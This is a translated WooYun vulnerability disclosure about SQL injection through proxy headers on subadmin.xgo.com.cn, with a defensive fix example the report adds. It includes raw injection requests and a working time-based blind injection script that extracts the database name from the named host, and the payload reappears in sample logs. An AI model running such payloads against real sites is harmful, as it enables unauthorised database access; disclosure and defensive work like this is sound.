
Vulnerability summary   Followers: 24

Defect ID: wooyun-2015-0122565

Title: SQL injection on a key 汽车点评 (Car Review) site: "Taking Nanjun by stratagem"

Vendor: xgo.com.cn

Author: 路人甲

Submitted: 2015-06-24 22:09

Fix deadline: 2015-08-09 10:44

Published: 2015-08-09 10:44

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor has confirmed

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-06-24: Details sent to the vendor, awaiting vendor action
2015-06-25: Vendor confirmed; details disclosed to the vendor only
2015-07-05: Details disclosed to core white hats and domain experts
2015-07-15: Details disclosed to regular white hats
2015-07-25: Details disclosed to intern white hats
2015-08-09: Details disclosed to the public

Brief description:

233

Detailed description:

subadmin.xgo.com.cn
A back-end administration system.

1. Injection via the X-Forwarded-For header (injection point marked with *):

GET /checkcode.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
X-Forwarded-For: *
X-Requested-With: XMLHttpRequest
Referer: subadmin.xgo.com.cn
Host: subadmin.xgo.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

2. Injection via the Client-IP header (injection point marked with *):

GET /checkcode.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Client-IP: *
X-Requested-With: XMLHttpRequest
Referer: subadmin.xgo.com.cn
Host: subadmin.xgo.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*


import httplib
import time

# Request headers copied from the report; X-Forwarded-For is the injection point.
headers = {"User-agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36",
           "Accept": "*/*",
           "Accept-Encoding": "gzip, deflate",
           "Content-Type": "application/x-www-form-urlencoded",
           "Connection": "keep-alive",
           "Host": "subadmin.xgo.com.cn",
           "X-Forwarded-For": "a",
           "Referer": "subadmin.xgo.com.cn",
           "X-Requested-With": "XMLHttpRequest"}

print 'start to retrieve MySQL database:'
user = ''
for i in range(1, 10):                 # character positions 1..9 of the database name
    flag = 0
    for payload in range(97, 123):     # ASCII codes for 'a'..'z'
        try:
            # Time-based probe: the server sleeps 2 s only when the guessed character matches.
            s = "aa'XOR(if(ascii(mid(lower(database()),%s,1))=%s,sleep(2),0))OR'bbb" % (i, payload)
            start_time = time.time()
            headers["X-Forwarded-For"] = s
            conn = httplib.HTTPConnection('subadmin.xgo.com.cn', timeout=5)
            s = "/checkcode.php"
            conn.request(method='GET', url=s, headers=headers)
            data3 = conn.getresponse().read()
        except:
            continue
        # A round trip of 2-3 s means the guess was right; the ASCII code is recorded
        # and mapped back to a character by hand (see the proof below).
        if (time.time() - start_time > 2) and (time.time() - start_time < 3):
            user += str(payload)
            user += "_"
            print '\n[in progress]', user
            flag = 1
            break
        else:
            pass
    if flag == 0:
        user += "*_"                   # no match in a..z at this position
print '\nMySQL database is', user

Proof of vulnerability:

[screenshot: 20150624210229.png]

Mapping the ASCII codes back to characters:
database: xgo_sub_p

Fix:

~~~~
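The report leaves the fix section empty. What follows is an added example, not code from the report or from xgo.com.cn: it validates the client address taken from X-Forwarded-For / Client-IP before it is used, writes it to the database with a bound parameter instead of string concatenation, and applies the same validation to access-log lines so that probes like the loop above stand out. The table name checkcode_log, the xff="..." log field and the sample log lines are all constructed for this example.

```python
import ipaddress
import re
import sqlite3

# Headers the report shows being reflected into SQL. Whether a deployment should
# honour them at all is a separate decision: only a header overwritten by your
# own reverse proxy is trustworthy, and then only its first element.
CLIENT_IP_HEADERS = ("x-forwarded-for", "client-ip")


def extract_client_ip(headers):
    """Return a validated client IP string from proxy headers, or None.

    The first comma-separated element of the first header present must parse
    as an IPv4/IPv6 address; anything else (such as the SQL fragment in the
    report) is rejected before it gets anywhere near a query.
    """
    lowered = {k.lower(): v for k, v in headers.items()}
    for name in CLIENT_IP_HEADERS:
        raw = lowered.get(name)
        if raw is None:
            continue
        candidate = raw.split(",")[0].strip()
        try:
            return str(ipaddress.ip_address(candidate))
        except ValueError:
            return None   # malformed: reject, do not fall through to the next header
    return None


def open_log_db():
    """In-memory table standing in for whatever /checkcode.php wrote to
    (the table name checkcode_log is an assumption for this example)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE checkcode_log (id INTEGER PRIMARY KEY, client_ip TEXT NOT NULL)")
    return conn


def record_check(conn, headers):
    """Store the caller's IP with a bound parameter. Returns True on success and
    False when no valid address was supplied (nothing is written then)."""
    ip = extract_client_ip(headers)
    if ip is None:
        return False
    # The value travels as a parameter, never inside the SQL text, so even a
    # string that slipped past validation could not alter the statement.
    conn.execute("INSERT INTO checkcode_log (client_ip) VALUES (?)", (ip,))
    conn.commit()
    return True


def logged_ips(conn):
    return [row[0] for row in conn.execute("SELECT client_ip FROM checkcode_log ORDER BY id")]


# Constructed access-log lines in a custom format that appends the raw
# X-Forwarded-For value as xff="..."; line 2 carries the report's time-based
# payload, line 3 a legitimate two-hop proxy chain.
SAMPLE_LOG = [
    '203.0.113.5 - - [24/Jun/2015:21:02:29 +0800] "GET /checkcode.php HTTP/1.1" 200 xff="203.0.113.5"',
    '203.0.113.5 - - [24/Jun/2015:21:02:31 +0800] "GET /checkcode.php HTTP/1.1" 200 '
    'xff="aa\'XOR(if(ascii(mid(lower(database()),1,1))=120,sleep(2),0))OR\'bbb"',
    '198.51.100.7 - - [24/Jun/2015:21:03:02 +0800] "GET /checkcode.php HTTP/1.1" 200 xff="198.51.100.7, 10.0.0.1"',
]

XFF_FIELD = re.compile(r'xff="([^"]*)"')


def suspicious_xff_lines(lines):
    """Return (line_number, value) for each log line whose X-Forwarded-For value
    is not a well-formed address list: the request-time check applied after the
    fact, which flags every iteration of a character-by-character probe."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = XFF_FIELD.search(line)
        if not m:
            continue
        value = m.group(1)
        if extract_client_ip({"X-Forwarded-For": value}) is None:
            hits.append((n, value))
    return hits


if __name__ == "__main__":
    db = open_log_db()
    print(record_check(db, {"X-Forwarded-For": "203.0.113.5", "Client-IP": "x"}))
    print(record_check(db, {"X-Forwarded-For": "aa'XOR(if(1=1,sleep(2),0))OR'bbb"}))
    print(logged_ips(db))
    print(suspicious_xff_lines(SAMPLE_LOG))
```

Strict parsing does most of the work: a value that ipaddress accepts cannot carry a quote or a function call, and the bound parameter keeps the query text independent of the value in any case. Whether to honour these headers at all depends on whether a trusted proxy in front of the application rewrites them; a client can set X-Forwarded-For to anything, which is exactly what the report relies on.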

Copyright notice: please credit 路人甲@乌云 when reposting.


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-06-25 10:43

Vendor reply:

Thanks for the pointers, it has been fixed.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2015-06-25 11:22 | 大亮 ( Regular White Hat | Rank: 306, vulnerabilities: 65 | hunting bugs slowly)

    @紫霞仙子, why do you always post anonymously?

  2. 2015-06-25 11:26 | 紫霞仙子 ( Regular White Hat | Rank: 2027, vulnerabilities: 279 | improving every day!!!)

    @大亮 I'd be embarrassed to have the vulnerability list full of me.

  3. 2015-06-25 11:32 | 大亮 ( Regular White Hat | Rank: 306, vulnerabilities: 65 | hunting bugs slowly)

    @紫霞仙子 That's exactly how you show how awesome you are.

  4. 2015-06-25 11:41 | 紫霞仙子 ( Regular White Hat | Rank: 2027, vulnerabilities: 279 | improving every day!!!)

    @大亮 I just want to hunt bugs in peace.